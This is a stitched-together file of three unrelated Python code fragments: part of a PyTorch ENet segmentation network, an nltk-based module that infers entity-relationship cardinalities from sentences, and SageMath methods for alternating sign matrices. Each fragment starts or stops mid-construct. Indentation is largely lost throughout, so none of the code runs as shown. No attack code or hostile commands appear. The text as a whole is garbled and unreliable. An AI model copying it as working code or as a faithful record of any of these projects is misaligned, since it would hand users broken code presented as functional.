128, dilation=16, padding=16, dropout_prob=0.1, relu=encoder_relu)
# Stage 3 - Encoder
self.regular3_0 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated3_1 = RegularBottleneck(
128, dilation=2, padding=2, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric3_2 = RegularBottleneck(
128,
kernel_size=5,
padding=2,
asymmetric=True,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated3_3 = RegularBottleneck(
128, dilation=4, padding=4, dropout_prob=0.1, relu=encoder_relu)
self.regular3_4 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated3_5 = RegularBottleneck(
128, dilation=8, padding=8, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric3_6 = RegularBottleneck(
128,
kernel_size=5,
asymmetric=True,
padding=2,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated3_7 = RegularBottleneck(
128, dilation=16, padding=16, dropout_prob=0.1, relu=encoder_relu)
# Stage 4 - Decoder
self.upsample4_0 = UpsamplingBottleneck(
128, 64, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.regular4_1 = RegularBottleneck(
64, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.regular4_2 = RegularBottleneck(
64, padding=1, dropout_prob=0.1, relu=decoder_relu)
# Stage 5 - Decoder
self.upsample5_0 = UpsamplingBottleneck(
64, 16, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.regular5_1 = RegularBottleneck(
16, padding=1, dropout_prob=0.1, relu=decoder_relu)
self.transposed_conv = nn.ConvTranspose2d(
16,
num_classes,
kernel_size=3,
stride=2,
padding=1,
output_padding=1,
bias=False)
def forward(self, x):
# Initial block
x = self.initial_block(x)
# Stage 1 - Encoder
x, max_indices1_0 = self.downsample1_0(x)
x = self.regular1_1(x)
x = self.regular1_2(x)
x = self.regular1_3(x)
x = self.regular1_4(x)
# Stage 2 - Encoder
x, max_indices2_0 = self.downsample2_0(x)
x = self.regular2_1(x)
x = self.dilated2_2(x)
        x = self.asymmetric2_3(x)
        x = self.dilated2_4(x)
        x = self.regular2_5(x)
        x = self.dilated2_6(x)
        x = self.asymmetric2_7(x)
        x = self.dilated2_8(x)
        # Stage 3 - Encoder
        x = self.regular3_0(x)
        x = self.dilated3_1(x)
        x = self.asymmetric3_2(x)
        x = self.dilated3_3(x)
        x = self.regular3_4(x)
        x = self.dilated3_5(x)
        x = self.asymmetric3_6(x)
        x = self.dilated3_7(x)
        # Stage 4 - Decoder
        x = self.upsample4_0(x, max_indices2_0)
        x = self.regular4_1(x)
        x = self.regular4_2(x)
        # Stage 5 - Decoder
        x = self.upsample5_0(x, max_indices1_0)
        x = self.regular5_1(x)
        return self.transposed_conv(x)
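# Illustrative end-to-end check (not part of the original source): ENet maps an input of shape
# (N, 3, H, W) to logits of shape (N, num_classes, H, W) when H and W are divisible by 8.
def _enet_shape_check(num_classes=12, size=256):
    model = ENet(num_classes)
    out = model(torch.randn(1, 3, size, size))
    assert out.shape == (1, num_classes, size, size)
    return out.shape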
import re
import inflect
import nltk
from src.pre_process.common_nlp import lemmatizer, text_into_sentence
from src.identify_relationship import binary_relationship_dic_list, ternary_relationship_list, \
unary_relationship_dic_list
from src.utils.file_manipulation import get_root_of_input_xml
one_to_one_relationship_list = []
one_to_many_relationship_list = []
many_to_many_relationship_list = []
binary_relation_list = []
ternary_relation_list = []
relation_list = []
p = inflect.engine()
print(ternary_relationship_list)
# Remove duplicate entries from the binary relationship list
def remove_duplicate_of_relationship_list_binary():
new_list = []
for dic in binary_relationship_dic_list:
member1 = dic.get('member1')
member2 = dic.get('member2')
lem_mem1 = lemmatizer.lemmatize(member1)
lem_mem2 = lemmatizer.lemmatize(member2)
index = binary_relationship_dic_list.index(dic)
for new_dic in binary_relationship_dic_list:
new_index = binary_relationship_dic_list.index(new_dic)
if index == new_index:
continue
else:
new_member1 = new_dic.get('member1')
new_member2 = new_dic.get('member2')
n_lem_mem1 = lemmatizer.lemmatize(new_member1)
n_lem_mem2 = lemmatizer.lemmatize(new_member2)
if (member1 == new_member1 and member2 == new_member2) or \
(member1 == n_lem_mem1 and member2 == n_lem_mem2) or \
(lem_mem1 == new_member1 and lem_mem2 == new_member2) or \
(member2 == new_member1 and member1 == new_member2) or \
(member2 == n_lem_mem1 and member1 == n_lem_mem2) or \
(lem_mem2 == new_member1 and lem_mem1 == new_member2) or (
lem_mem1 == new_member2 and member2 == n_lem_mem1):
tokenize_member1 = nltk.word_tokenize(member1)
tag_member1 = nltk.pos_tag(tokenize_member1)
tokenize_member2 = nltk.word_tokenize(member2)
tag_member2 = nltk.pos_tag(tokenize_member2)
new_tokenize_member1 = nltk.word_tokenize(new_member1)
new_tag_member1 = nltk.pos_tag(new_tokenize_member1)
new_tokenize_member2 = nltk.word_tokenize(new_member2)
new_tag_member2 = nltk.pos_tag(new_tokenize_member2)
if tag_member1[0][1] == 'NNS' or tag_member2[0][1] == 'NNS':
binary_relationship_dic_list.remove(new_dic)
elif new_tag_member1[0][1] == 'NNS' or new_tag_member2[0][1] == 'NNS':
binary_relationship_dic_list.remove(dic)
else:
binary_relationship_dic_list.remove(dic)
# print(relationship_dic_list)
return binary_relationship_dic_list
# Find the sentences that mention a given pair of binary-relationship members and their relationship
def get_sentences_match_with_entities_binary(member1, member2, relationship):
matching_sentences_list = []
sentence_list = text_into_sentence()
lem_member1 = lemmatizer.lemmatize(member1)
lem_member2 = lemmatizer.lemmatize(member2)
new_relationship_list = relationship.split('_')
if len(new_relationship_list) > 1:
correct_relationship = new_relationship_list[1]
else:
correct_relationship = new_relationship_list[0]
relationship_lem = lemmatizer.lemmatize(correct_relationship, pos="v")
    # Regular expressions used to find the relevant sentences
regex_1 = r"" + re.escape(member1) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member2)
regex_2 = r"" + re.escape(member1) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member2)
regex_3 = r"" + re.escape(lem_member1) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member2)
regex_4 = r"" + re.escape(lem_member1) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member2)
regex_5 = r"" + re.escape(lem_member1) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(lem_member2)
regex_6 = r"" + re.escape(member2) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member1)
regex_7 = r"" + re.escape(member2) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member1)
regex_8 = r"" + re.escape(lem_member2) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(member1)
regex_9 = r"" + re.escape(lem_member2) + "(.*)" + re.escape(relationship_lem) + "(.*)" + re.escape(member1)
regex_10 = r"" + re.escape(lem_member2) + "(.*)" + re.escape(correct_relationship) + "(.*)" + re.escape(lem_member1)
    regexes = [regex_1, regex_2, regex_3, regex_4, regex_5,
               regex_6, regex_7, regex_8, regex_9, regex_10]
    for sentence in sentence_list:
        if any(re.search(regex, sentence, re.MULTILINE | re.IGNORECASE) for regex in regexes):
            print(sentence)
            matching_sentences_list.append(sentence)
    return matching_sentences_list
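# Illustrative regex check (hypothetical sentence and entity names, not taken from the input
# corpus): shows how the member/relationship patterns above pick out a matching sentence.
def _demo_binary_sentence_match():
    sentence = "Each department employs many lecturers."
    pattern = r"department" + "(.*)" + re.escape("employ") + "(.*)" + "lecturers"
    return bool(re.search(pattern, sentence, re.MULTILINE | re.IGNORECASE))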
def get_nouns_list(sentence):
pos_tag_list = nltk.pos_tag(sentence)
noun_list = []
# print(pos_tag_list)
for data in pos_tag_list:
if data[1] == 'NN' or data[1] == 'NNS':
noun_list.append(data[0])
# print(noun_list)
return noun_list
def find_primary_key(member):
root = get_root_of_input_xml()
lem_member = lemmatizer.lemmatize(member)
for entity_ref in root.findall('entity'):
entity = entity_ref.get('name')
if entity == member or entity == lem_member:
for attri_ref in entity_ref.findall('attribute'):
if attri_ref.get('value') == "primary_key":
return attri_ref.get('name')
def get_binary_cardinality_list():
new_relationship_dic_list_binary = remove_duplicate_of_relationship_list_binary()
for dic in new_relationship_dic_list_binary:
plural_member1 = dic.get('member1')
# print(member1)
plural_member2 = dic.get('member2')
# print(member2)
relationship = dic.get('relationship')
# print(relationship)
sentence_list = get_sentences_match_with_entities_binary(plural_member1, plural_member2, relationship)
sentence_set = list(set(sentence_list))
# print(sentence_set)
member1_primary_key = find_primary_key(plural_member1)
member2_primary_key = find_primary_key(plural_member2)
# print(member1, " primary key is : ", member1_primary_key)
# print(member2, " primary key is : ", member2_primary_key)
singular_member1 = lemmatizer.lemmatize(plural_member1)
singular_member2 = lemmatizer.lemmatize(plural_member2)
if find_cardinality_many(plural_member1, sentence_set):
if find_cardinality_many(plural_member2, sentence_set):
binary_relation_list.append({"@name": relationship, "@degree": "binary", "@type": "many_to_many",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
binary_relation_list.append(
{"@name": relationship, "@degree": "binary", "@type": "one_to_many",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(plural_member1, sentence_set, relationship):
if find_cardinality_many(plural_member2, sentence_set):
singular_member1 = lemmatizer.lemmatize(plural_member1)
singular_member2 = lemmatizer.lemmatize(plural_member2)
binary_relation_list.append(
{"@name": relationship, "@degree": "binary", "@type": "one_to_many",
"member1": {"@name": singular_member1, "@cardinality": "one", "@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
binary_relation_list.append(
{"@name": relationship, "@degree": "binary", "@type": "one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one", "@primary_key": member1_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
# ...............................
if find_cardinality_many(plural_member1, sentence_set):
if find_cardinality_many(plural_member2, sentence_set):
many_to_many_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
one_to_many_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
elif find_cardinality_one(plural_member1, sentence_set, relationship):
if find_cardinality_many(plural_member2, sentence_set):
one_to_many_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
elif find_cardinality_one(plural_member2, sentence_set, relationship):
one_to_one_relationship_list.append(
{'member1': plural_member1, 'member2': plural_member2, 'relationship': relationship})
# print("1 2 1", one_to_one_relationship_list)
# print("1 2 M", one_to_many_relationship_list)
# print("M 2 M", many_to_many_relationship_list)
print("rel", binary_relation_list)
return binary_relation_list
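# Hypothetical example of a single binary_relation_list entry (illustrative only; the entity
# names and primary keys are invented, not derived from the input corpus):
_example_binary_relation = {
    "@name": "works_in", "@degree": "binary", "@type": "one_to_many",
    "member1": {"@name": "employee", "@cardinality": "many", "@primary_key": "employee_id"},
    "member2": {"@name": "department", "@cardinality": "one", "@primary_key": "department_id"},
}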
def get_sentences_match_with_entities_ternary(member1, member2, member3, relation):
match_ternary_sentence_list = []
    # Regular expression used to find sentences in which the ternary relationship occurs
regex = r"(" + re.escape(member1) + "|" + re.escape(member2) + "|" + re.escape(member3) + ")" + "(.*)" + re.escape(
relation) + "(.*)" + "(" + re.escape(member1) + "|" + re.escape(member2) + "|" + re.escape(
member3) + ")" + "(.*)" + "(" + re.escape(member1) + "|" + re.escape(member2) + "|" + re.escape(member3) + ")"
print(regex)
sentence_list = text_into_sentence()
for sentence in sentence_list:
if re.search(regex, sentence, re.MULTILINE | re.IGNORECASE):
match_ternary_sentence_list.append(sentence)
print("*************", sentence)
return match_ternary_sentence_list
def get_ternary_cardinality_list():
for dic in ternary_relationship_list:
member1 = dic.get('member1')
member2 = dic.get('member2')
member3 = dic.get('member3')
relation = dic.get('relationship')
sentence_list = get_sentences_match_with_entities_ternary(member1, member2, member3, relation)
member1_primary_key = find_primary_key(member1)
member2_primary_key = find_primary_key(member2)
member3_primary_key = find_primary_key(member3)
singular_member1 = lemmatizer.lemmatize(member1)
singular_member2 = lemmatizer.lemmatize(member2)
singular_member3 = lemmatizer.lemmatize(member3)
if find_cardinality_many(member1, sentence_list):
if find_cardinality_many(member2, sentence_list):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_many",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_one",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member2, sentence_list, relation):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_one",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "many",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(member1, sentence_list, relation):
if find_cardinality_many(member2, sentence_list):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_many_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "many",
"@primary_key": member2_primary_key}})
elif find_cardinality_one(member2, sentence_list, relation):
if find_cardinality_many(member3, sentence_list):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "many_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "many",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}}),
elif find_cardinality_one(member3, sentence_list, relation):
ternary_relation_list.append(
{"@name": relation, "@degree": "ternary", "@type": "one_to_one_to_one",
"member1": {"@name": singular_member1, "@cardinality": "one",
"@primary_key": member1_primary_key},
"member3": {"@name": singular_member3, "@cardinality": "one",
"@primary_key": member3_primary_key},
"member2": {"@name": singular_member2, "@cardinality": "one",
"@primary_key": member2_primary_key}})
return ternary_relation_list
def get_unary_cardinality_list():
unary_cardinality_list = []
for dic in unary_relationship_dic_list:
relation = dic.get('relationship')
plural_member = dic.get("member")
member = lemmatizer.lemmatize(plural_member)
primary_key = find_primary_key(member)
unary_cardinality_list.append({"@name": relation, "@degree": "unary", "@type": "one_to_one",
"member1": {"@name": member, "@cardinality": "one",
"@primary_key": primary_key},
"member2": {"@name": member, "@cardinality": "one",
"@primary_key": primary_key}})
print(unary_cardinality_list)
return unary_cardinality_list
def find_cardinality():
binary_cardinality_list = get_binary_cardinality_list()
ternary_cardinality_list = get_ternary_cardinality_list()
unary_cardinality_list = get_unary_cardinality_list()
print("### Binary ###", binary_cardinality_list)
print("### Ternary ####", ternary_cardinality_list)
print("### Unary ####", unary_cardinality_list)
relation_list = binary_cardinality_list + ternary_cardinality_list + unary_cardinality_list
print(relation_list)
return relation_list
def find_cardinality_one(member, sentence_list, relationship):
value = False
    # Regular expression used to detect cardinality "one" cues
RE_4_1 = r'.*((only|exactly) one|uniquely|no.* more than one)(.*)' + re.escape(member)
for line in sentence_list:
for match in re.finditer(RE_4_1, line):
value = True
return value
if not value:
tokenize_member = nltk.word_tokenize(member)
tag_member = nltk.pos_tag(tokenize_member)
if tag_member[0][1] == 'NN':
value = True
            return value
    return value
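# Illustrative check of the cardinality-one cue above (hypothetical sentence, not taken from
# the input corpus).
def _demo_cardinality_one_cue():
    sentence = "Each employee works in exactly one department."
    pattern = r'.*((only|exactly) one|uniquely|no.* more than one)(.*)' + re.escape("department")
    return bool(re.search(pattern, sentence))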
        [3 2 1 0]
sage: asm = A([[0, 1, 0],[1, -1, 1],[0, 1, 0]])
sage: asm.height_function()
[0 1 2 3]
[1 2 1 2]
[2 1 2 1]
[3 2 1 0]
sage: asm = A([[0, 0, 1],[1, 0, 0],[0, 1, 0]])
sage: asm.height_function()
[0 1 2 3]
[1 2 1 2]
[2 3 2 1]
[3 2 1 0]
"""
asm = self.to_matrix()
n = asm.nrows() + 1
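        # Each height-function entry is h(i, j) = i + j - 2 * (sum of the ASM entries weakly
        # north-west of position (i, j)), computed via nw_corner_sum.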
return matrix([[i+j-2*nw_corner_sum(asm,i,j) for i in range(n)] for j in range(n)])
@combinatorial_map(name='gyration')
def gyration(self):
r"""
Return the alternating sign matrix obtained by applying the gyration
action to the height function in bijection with ``self``.
Gyration acts on height functions as follows. Go through the entries of
the matrix, first those for which the sum of the row and column indices
is even, then for those for which it is odd, and increment or decrement
the squares by 2 wherever possible such that the resulting matrix is
still a height function. Gyration was first defined in [Wieland00]_ as
an action on fully-packed loops.
REFERENCES:
        .. [Wieland00] B. Wieland. *A large dihedral symmetry of the set of
alternating sign matrices*. Electron. J. Combin. 7 (2000).
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: A([[1, 0, 0],[0, 1, 0],[0, 0, 1]]).gyration()
[0 0 1]
[0 1 0]
[1 0 0]
sage: asm = A([[0, 1, 0],[1, -1, 1],[0, 1, 0]])
sage: asm.gyration()
[1 0 0]
[0 1 0]
[0 0 1]
sage: asm = A([[0, 0, 1],[1, 0, 0],[0, 1, 0]])
sage: asm.gyration()
[0 1 0]
[0 0 1]
[1 0 0]
"""
A = self.parent()
hf = list(self.height_function())
k = len(hf) - 1
for i in range(1,k):
for j in range(1,k):
if (i+j) % 2 == 0 \
and hf[i-1][j] == hf[i+1][j] == hf[i][j+1] == hf[i][j-1]:
if hf[i][j] < hf[i+1][j]:
hf[i][j] += 2
else:
hf[i][j] -= 2
for i in range(1,k):
for j in range(1,k):
if (i+j) % 2 == 1 \
and hf[i-1][j] == hf[i+1][j] == hf[i][j+1] == hf[i][j-1]:
if hf[i][j] < hf[i+1][j]:
hf[i][j] += 2
else:
hf[i][j] -= 2
return A.from_height_function(matrix(hf))
def ASM_compatible(self, B):
r"""
Return ``True`` if ``self`` and ``B`` are compatible alternating sign
matrices in the sense of [EKLP92]_. (If ``self`` is of size `n`, ``B``
must be of size `n+1`.)
In [EKLP92]_, there is a notion of a pair of ASM's with sizes differing
by 1 being compatible, in the sense that they can be combined to encode
a tiling of the Aztec Diamond.
REFERENCES:
        .. [EKLP92] N. Elkies, G. Kuperberg, M. Larsen, and J. Propp,
*Alternating-Sign Matrices and Domino Tilings*, Journal of Algebraic
Combinatorics, volume 1 (1992), p. 111-132.
EXAMPLES::
sage: A = AlternatingSignMatrix(matrix([[0,0,1,0],[0,1,-1,1],[1,0,0,0],[0,0,1,0]]))
sage: B = AlternatingSignMatrix(matrix([[0,0,1,0,0],[0,0,0,1,0],[1,0,0,-1,1],[0,1,0,0,0],[0,0,0,1,0]]))
sage: A.ASM_compatible(B)
True
sage: A = AlternatingSignMatrix(matrix([[0,1,0],[1,-1,1],[0,1,0]]))
sage: B = AlternatingSignMatrix(matrix([[0,0,1,0],[0,0,0,1],[1,0,0,0],[0,1,0,0]]))
sage: A.ASM_compatible(B)
False
"""
if B.parent()._n - self.parent()._n != 1:
raise ValueError("mismatched sizes")
AA = self.corner_sum_matrix()
BB = B.corner_sum_matrix()
for i in range(0, len(AA[0])):
for j in range(0, len(AA[0])):
if not (AA[i,j]>=BB[i,j] and AA[i,j]>=BB[i+1,j+1]-1 \
and AA[i,j]<=BB[i+1,j] and AA[i,j]<=BB[i,j+1]):
return False
return True
def ASM_compatible_bigger(self):
r"""
Return all ASM's compatible with ``self`` that are of size one greater
than ``self``.
Given an `n \times n` alternating sign matrix `A`, there are as many
ASM's of size `n+1` compatible with `A` as 2 raised to the power of
the number of 1's in `A` [EKLP92]_.
EXAMPLES::
sage: A = AlternatingSignMatrix(matrix([[1,0],[0,1]]))
sage: A.ASM_compatible_bigger()
[
[ 0 1 0] [1 0 0] [0 1 0] [1 0 0]
[ 1 -1 1] [0 0 1] [1 0 0] [0 1 0]
[ 0 1 0], [0 1 0], [0 0 1], [0 0 1]
]
sage: B = AlternatingSignMatrix(matrix([[0,1],[1,0]]))
sage: B.ASM_compatible_bigger()
[
[0 0 1] [0 0 1] [0 1 0] [ 0 1 0]
[0 1 0] [1 0 0] [0 0 1] [ 1 -1 1]
[1 0 0], [0 1 0], [1 0 0], [ 0 1 0]
]
"""
n = self.parent()._n + 1
M = AlternatingSignMatrices(n)
sign = []
asm = self.to_matrix()
B = matrix(n+1)
A = matrix([[2*(i+j-2*nw_corner_sum(asm,i,j))+1 for i in range(n)]
for j in range(n)])
for a in range(n+1):
B[a,0] = 2*a
B[0,a] = 2*a
B[a,n] = 2*(n-a)
B[n,a] = 2*(n-a)
for i in range(1,n):
for j in range(1,n):
if A[i-1,j-1] == A[i,j] == A[i-1,j]-2 == A[i,j-1]-2:
B[i,j] = -A[i,j]
sign.append([i,j])
else:
B[i,j] = list({A[i-1,j-1]-1,A[i-1,j-1]+3} & {A[i-1,j]-3,A[i-1,j]+1} & {A[i,j-1]-3,A[i,j-1]+1} & {A[i,j]-1,A[i,j]+3})[0]
output = [B]
for b in range(len(sign)):
N = len(output)
for c in range(N):
d = copy.copy(output[c])
output[c][sign[b][0],sign[b][1]] = -output[c][sign[b][0], sign[b][1]] + 3
d[sign[b][0],sign[b][1]] = -d[sign[b][0], sign[b][1]]-1
output.append(d)
for k in range(len(output)):
output[k] = M.from_height_function(output[k]/2)
        return output
def ASM_compatible_smaller(self):
r"""
Return the list of all ASMs compatible with ``self`` that are of size
one smaller than ``self``.
Given an alternating sign matrix `A` of size `n`, there are as many
ASM's of size `n-1` compatible with it as 2 raised to the power of
the number of `-1`'s in `A` [EKLP92]_.
EXAMPLES::
sage: A = AlternatingSignMatrix(matrix([[0,0,1,0],[0,1,-1,1],[1,0,0,0],[0,0,1,0]]))
sage: A.ASM_compatible_smaller()
[
[0 0 1] [ 0 1 0]
[1 0 0] [ 1 -1 1]
[0 1 0], [ 0 1 0]
]
sage: B = AlternatingSignMatrix(matrix([[1,0,0],[0,0,1],[0,1,0]]))
sage: B.ASM_compatible_smaller()
[
[1 0]
[0 1]
]
"""
n = self.parent()._n
M = AlternatingSignMatrices(n)
A = matrix(n)
asm = self.to_matrix()
B = matrix([[2*(i+j-2*nw_corner_sum(asm,i,j)) for i in range(n)] for j in range(n)])
sign = []
for a in range(n):
A[a,0] = 2*a + 1
A[0,a] = 2*a + 1
A[n-1,a] = 2*(n-a) - 1
A[a,n-1] = 2*(n-a) - 1
for i in range(n-1):
for j in range(n-1):
if B[i+1,j+1] == B[i,j] == B[i,j+1]+2 == B[i+1,j]+2:
A[i,j] = -B[i,j]
sign.append([i,j])
else:
A[i,j] = list({B[i,j]+1,B[i,j]-3} & {B[i,j+1]+3,B[i,j+1]-1} & {B[i+1,j]+3,B[i+1,j]-1} & {B[i+1,j+1]+1,B[i+1,j+1]-3})[0]
output = [A]
for b in range(len(sign)):
N = len(output)
for c in range(N):
d = copy.copy(output[c])
output[c][sign[b][0],sign[b][1]] = -output[c][sign[b][0], sign[b][1]]+1
d[sign[b][0],sign[b][1]] = -d[sign[b][0], sign[b][1]]-3
output.append(d)
for k in range(0,len(output)):
output[k] = M.from_height_function((output[k]-matrix.ones(n,n))/2)
        return output
@combinatorial_map(name='to Dyck word')
def to_dyck_word(self):
r"""
Return the Dyck word determined by the last diagonal of
the monotone triangle corresponding to ``self``.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: A([[0,1,0],[1,0,0],[0,0,1]]).to_dyck_word()
[1, 1, 0, 0, 1, 0]
sage: d = A([[0,1,0],[1,-1,1],[0,1,0]]).to_dyck_word(); d
[1, 1, 0, 1, 0, 0]
sage: parent(d)
Complete Dyck words
"""
MT = self.to_monotone_triangle()
nplus = self._matrix.nrows() + 1
parkfn = [nplus - row[0] for row in list(MT) if len(row) > 0]
return NonDecreasingParkingFunction(parkfn).to_dyck_word().reverse()
def number_negative_ones(self):
"""
Return the number of entries in ``self`` equal to -1.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: asm = A([[0,1,0],[1,0,0],[0,0,1]])
sage: asm.number_negative_ones()
0
sage: asm = A([[0,1,0],[1,-1,1],[0,1,0]])
sage: asm.number_negative_ones()
1
"""
a = self._matrix
return sum(1 for (i,j) in a.nonzero_positions() if a[i,j] == -1)
def is_permutation(self):
"""
Return ``True`` if ``self`` is a permutation matrix
and ``False`` otherwise.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: asm = A([[0,1,0],[1,0,0],[0,0,1]])
sage: asm.is_permutation()
True
sage: asm = A([[0,1,0],[1,-1,1],[0,1,0]])
sage: asm.is_permutation()
False
"""
return self.number_negative_ones() == 0
def to_permutation(self):
"""
Return the corresponding permutation if ``self`` is a permutation
matrix.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: asm = A([[0,1,0],[1,0,0],[0,0,1]])
sage: p = asm.to_permutation(); p
[2, 1, 3]
sage: parent(p)
Standard permutations
sage: asm = A([[0,1,0],[1,-1,1],[0,1,0]])
sage: asm.to_permutation()
Traceback (most recent call last):
...
ValueError: Not a permutation matrix
"""
if not self.is_permutation():
raise ValueError('Not a permutation matrix')
asm_matrix = self.to_matrix()
return Permutation([ j+1 for (i,j) in asm_matrix.nonzero_positions() ])
@combinatorial_map(name='to semistandard tableau')
def to_semistandard_tableau(self):
"""
Return the semistandard tableau corresponding the monotone triangle
corresponding to ``self``.
EXAMPLES::
sage: A = AlternatingSignMatrices(3)
sage: A([[0,0,1],[1,0,0],[0,1,0]]).to_semistandard_tableau()
[[1, 1, 3], [2, 3], [3]]
sage: t = A([[0,1,0],[1,-1,1],[0,1,0]]).to_semistandard_tableau(); t
[[1, 1, 2], [2, 3], [3]]
sage: parent(t)
Semistandard tableaux
"""
from sage.combinat.tableau import SemistandardTableau, SemistandardTableaux
mt = self.to_monotone_triangle()
ssyt = [[0]*(len(mt) - j) for j in range(len(mt))]
for i in range(len(mt)):
for j in range(len(mt[i])):
ssyt[i][j] = mt[j][-(i+1)]
return SemistandardTableau(ssyt)